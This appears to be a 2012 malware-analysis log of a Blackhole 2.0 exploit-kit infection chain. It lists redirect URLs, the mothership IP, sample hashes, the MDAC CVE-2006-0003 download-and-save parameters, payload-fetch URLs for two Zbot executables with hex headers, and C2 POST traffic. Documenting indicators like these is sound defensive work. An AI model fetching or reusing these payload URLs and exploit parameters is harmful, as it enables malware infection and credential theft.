Blackhole 2.0 w/ PluginDetect
Without shellcode; drops 2 Zbot samples: a backdoor and a stealer
Mothership: 69.194.194.221
============
samples:
============
5d7efa0.exe (5/52) 79c701d0ef7e369ba82d6a77e7e4b42f https://www.virustotal.com/file/32ee0f16ff2e8034ae7b21a9ada852fa5ae0535f9c99fd9a5c8635573fdc2e3c/analysis/1349111222/
updateflashplayer.exe (1/42) 272950443ed0ed5b2b9e0346f848f412 https://www.virustotal.com/file/341adaccb6d88cde2f4cbc0ea95dc25f56948266e9ac98490991e98a6851c142/analysis/1349111482/
index.html (2/40) 7edae162a198089f69927ebd9929652b https://www.virustotal.com/file/11b7a52ae29d3c84d8f15fc211328e5e7cc8fda33959ce314d008b54c2cb270e/analysis/1349110087/
js.js (2/42) 373c7eab6b2d0353bcf66bd37cfcde67 https://www.virustotal.com/file/2cc16d1a740e952caa2add649e2ebeb7397ca685137b08d50b1baacec88a3ea7/analysis/1349110384/
raising-peak_suited.php (2/42) 4ae1a158abb001237fb719375b9e5e0e https://www.virustotal.com/file/fd12197c2759a0b7d79d8da7d05f34e840d1914eebc34659d80a8c2bf22379a1/analysis/1349110549/
===================
Chain of infection
===================
h00p://mercantilcorma.mx/6fu4Dm5j/index.html
h00p://cheerstuffreno.com/oZZETLq6/js.js
h00p://free-onlinecasino.co.uk/B7BU1DC6/js.js
h00p://jeanyipindonesia.com/DxAqbpsL/js.js
h00p://69.194.194.221/links/raising-peak_suited.php
PluginDetect (obfuscated): http://pastebin.com/raw.php?i=h1ETdpgs
PluginDetect (deobfuscated): http://pastebin.com/raw.php?i=79PDEWHp
(MDAC) CVE-2006-0003
Object: BD96C556-65A3-11D0-983A-00C04FC29E36
Shell.Application / msxml2.XMLHTTP
Payload: h00p://69.194.194.221/links/raising-peak_suited.php?jzcvg=343836040a&ljduq=37080537020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb
SaveToFile : .//..//5d7efa0.exe
mimeType : "application/pdf", navPluginObj : null,
progID : ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000",
h00p://69.194.194.221/updateflashplayer.exe
=====================
LOGS
=====================
--01:05:06-- http://mercantilcorma.mx/6fu4Dm5j/index.html
=> `index.html'
Resolving mercantilcorma.mx... 67.23.249.227
Connecting to mercantilcorma.mx|67.23.249.227|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 437 [text/html]
01:05:07 (15.38 MB/s) - `index.html' saved [437/437]
--01:05:22-- http://cheerstuffreno.com/oZZETLq6/js.js
=> `js.js'
Resolving cheerstuffreno.com... 50.118.59.251
Connecting to cheerstuffreno.com|50.118.59.251|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 72 [application/javascript]
01:05:23 (2.61 MB/s) - `js.js' saved [72/72]
// Tor looks blocked perfectly....
// gatling IP fetch script starts....
--01:23:34-- http://69.194.194.221/links/raising-peak_suited.php
=> `raising-peak_suited.php'
Connecting to 69.194.194.221:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
01:23:35 (54.79 KB/s) - `raising-peak_suited.php' saved [28905]
(MDAC) CVE-2006-0003
Arbitrary file download via the Microsoft Data Access Components
BD96C556-65A3-11D0-983A-00C04FC29E36
Shell.Application
msxml2.XMLHTTP
SaveToFile : .//..//5d7efa0.exe
http://69.194.194.221/links/raising-peak_suited.php?jzcvg=343836040a&ljduq=37080537020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb
mimeType : "application/pdf", navPluginObj : null,
progID : ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000",
http://69.194.194.221/updateflashplayer.exe
--01:31:53-- http://69.194.194.221/updateflashplayer.exe
=> `updateflashplayer.exe'
Connecting to 69.194.194.221:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 511,488 (500K) [application/octet-stream]
01:31:57 (165.71 KB/s) - `updateflashplayer.exe' saved [511488/511488]
0000 4D 5A 50 00 03 00 00 00 00 00 0F 00 FF FF 00 00 MZP.............
0010 00 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 7C 00 00 00 ............|...
0040 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 ........!..L.!..
0050 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 This program mus
0060 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 t be run under W
0070 69 6E 33 32 0D 0A 24 37 00 00 00 00 50 45 00 00 in32..$7....PE..
0080 4C 01 04 00 00 00 00 00 00 00 00 00 00 00 00 00 L...............
0090 E0 00 0F 01 0B 01 06 00 00 10 00 00 00 BA 07 00 ................
--01:32:30-- http://69.194.194.221/links/raising-peak_suited.php?jzcvg=343836040a&ljduq=37080537020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb
=> `raising-peak_suited.php@jzcvg=343836040a&ljduq=370805370205080306
36&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb'
Connecting to 69.194.194.221:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 117,760 (115K) [application/x-msdownload]
01:32:32 (102.29 KB/s) - `raising-peak_suited.php@jzcvg=343836040a&ljduq=3708053
7020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb' saved [117760/117760]
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 07 00 17 4C 69 50 00 00 00 00 PE..L....LiP....
0090 00 00 00 00 E0 00 0F 03 0B 01 02 38 00 28 00 00 ...........8.(..
POST HTTP/1.1
69.194.194.221 POST /forum/viewtopic.php HTTP/1.0
69.194.194.221 POST /forum/viewtopic.php HTTP/1.0
69.194.194.221 POST /forum/viewtopic.php HTTP/1.0
===========================
Oct 1st, 2012
===========================